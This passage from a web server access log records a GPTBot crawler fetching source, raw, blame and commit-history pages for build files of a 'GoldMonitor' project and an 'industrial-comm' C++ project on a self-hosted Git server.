(KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1" +[17/Feb/2026:16:02:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/PKG-00.toc" [Client 74.7.227.38] [Length 70834] [Gzip 17.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2" +[17/Feb/2026:16:02:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/EXE-00.toc" [Client 74.7.227.38] [Length 160654] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/EXE-00.toc" +[17/Feb/2026:16:02:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.pyz" [Client 74.7.227.38] [Length 10881] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1" +[17/Feb/2026:16:02:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/EXE-00.toc" [Client 74.7.227.38] [Length 9918] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/EXE-00.toc" +[17/Feb/2026:16:02:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/EXE-00.toc" [Client 74.7.227.38] [Length 99914] [Gzip 29.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/EXE-00.toc" +[17/Feb/2026:16:02:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.toc" [Client 74.7.227.38] [Length 37053] [Gzip 14.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3" +[17/Feb/2026:16:02:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.toc" [Client 74.7.227.38] [Length 9918] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.toc" +[17/Feb/2026:16:02:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.toc" [Client 74.7.227.38] [Length 9916] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.toc" +[17/Feb/2026:16:02:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp" [Client 74.7.227.38] [Length 10175] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp" +[17/Feb/2026:16:02:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/EXE-00.toc" [Client 74.7.227.38] [Length 9917] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/EXE-00.toc" +[17/Feb/2026:16:02:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/EXE-00.toc" [Client 74.7.227.38] [Length 9916] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/EXE-00.toc" +[17/Feb/2026:16:02:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/PKG-00.toc" [Client 74.7.227.38] [Length 9916] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/PKG-00.toc" +[17/Feb/2026:16:02:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.toc" [Client 74.7.227.38] [Length 49770] [Gzip 27.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.toc" +[17/Feb/2026:16:02:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.pyz" [Client 74.7.227.38] [Length 9882] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.pyz" +[17/Feb/2026:16:02:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/EXE-00.toc" [Client 74.7.227.38] [Length 100852] [Gzip 29.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/EXE-00.toc" +[17/Feb/2026:16:02:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/PKG-00.toc" [Client 74.7.227.38] [Length 99738] [Gzip 29.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/PKG-00.toc" +[17/Feb/2026:16:02:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.toc" [Client 74.7.227.38] [Length 9917] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.toc" +[17/Feb/2026:16:02:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.pyz" [Client 74.7.227.38] [Length 13192929] [Gzip 11.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.pyz" +[17/Feb/2026:16:02:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.toc" [Client 74.7.227.38] [Length 47680] [Gzip 26.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.toc" +[17/Feb/2026:16:02:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.toc" [Client 74.7.227.38] [Length 47687] [Gzip 26.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.toc" +[17/Feb/2026:16:02:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/EXE-00.toc" [Client 74.7.227.38] [Length 101235] [Gzip 29.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/EXE-00.toc" +[17/Feb/2026:16:02:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/PKG-00.toc" [Client 74.7.227.38] [Length 159003] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/PKG-00.toc" +[17/Feb/2026:16:02:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.toc" [Client 74.7.227.38] [Length 69020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.toc" +[17/Feb/2026:16:02:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/EXE-00.toc" [Client 74.7.227.38] [Length 160535] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/EXE-00.toc" +[17/Feb/2026:16:02:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.pyz" [Client 74.7.227.38] [Length 10909] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3" +[17/Feb/2026:16:02:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.toc" [Client 74.7.227.38] [Length 38620] [Gzip 14.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1" +[17/Feb/2026:16:02:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/PKG-00.toc" [Client 74.7.227.38] [Length 70895] [Gzip 17.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3" +[17/Feb/2026:16:02:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/CMakeLists.txt" [Client 74.7.227.38] [Length 11619] [Gzip 3.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp" +[17/Feb/2026:16:02:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.toc" [Client 74.7.227.38] [Length 69020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.toc" +[17/Feb/2026:16:02:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/PKG-00.toc" [Client 74.7.227.38] [Length 70861] [Gzip 17.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3" +[17/Feb/2026:16:02:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/EXE-00.toc" [Client 74.7.227.38] [Length 72030] [Gzip 17.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1" +[17/Feb/2026:16:02:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/cpp/CMakeLists.txt" [Client 74.7.227.38] [Length 295] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/cpp/CMakeLists.txt" +[17/Feb/2026:16:02:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/EXE-00.toc" [Client 74.7.227.38] [Length 72043] [Gzip 17.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2" +[17/Feb/2026:16:02:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp" [Client 74.7.227.38] [Length 11061] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build" +[17/Feb/2026:16:02:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/PKG-00.toc" [Client 74.7.227.38] [Length 70838] [Gzip 17.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2" +[17/Feb/2026:16:02:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.pyz" [Client 74.7.227.38] [Length 9917] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.pyz" +[17/Feb/2026:16:02:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.toc" [Client 74.7.227.38] [Length 9917] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.toc" +[17/Feb/2026:16:02:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/PKG-00.toc" [Client 74.7.227.38] [Length 9917] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/PKG-00.toc" +[17/Feb/2026:16:02:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/CMakeLists.txt" [Client 74.7.227.38] [Length 11044] [Gzip 4.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/CMakeLists.txt" +[17/Feb/2026:16:02:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/CMakeLists.txt" [Client 74.7.227.38] [Length 9931] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/CMakeLists.txt" +[17/Feb/2026:16:02:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/PKG-00.toc" [Client 74.7.227.38] [Length 9882] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/PKG-00.toc" +[17/Feb/2026:16:02:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/EXE-00.toc" [Client 74.7.227.38] [Length 9917] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/EXE-00.toc" +[17/Feb/2026:16:03:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/PKG-00.toc" [Client 74.7.227.38] [Length 100038] [Gzip 29.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/PKG-00.toc" +[17/Feb/2026:16:03:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/EXE-00.toc" [Client 74.7.227.38] [Length 9882] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/EXE-00.toc" +[17/Feb/2026:16:03:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp" [Client 74.7.227.38] [Length 10201] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp" +[17/Feb/2026:16:03:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/PKG-00.toc" [Client 74.7.227.38] [Length 9918] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/PKG-00.toc" +[17/Feb/2026:16:03:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles" [Client 74.7.227.38] [Length 10428] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp" +[17/Feb/2026:16:03:04 +0000] - 200 200 - GET https 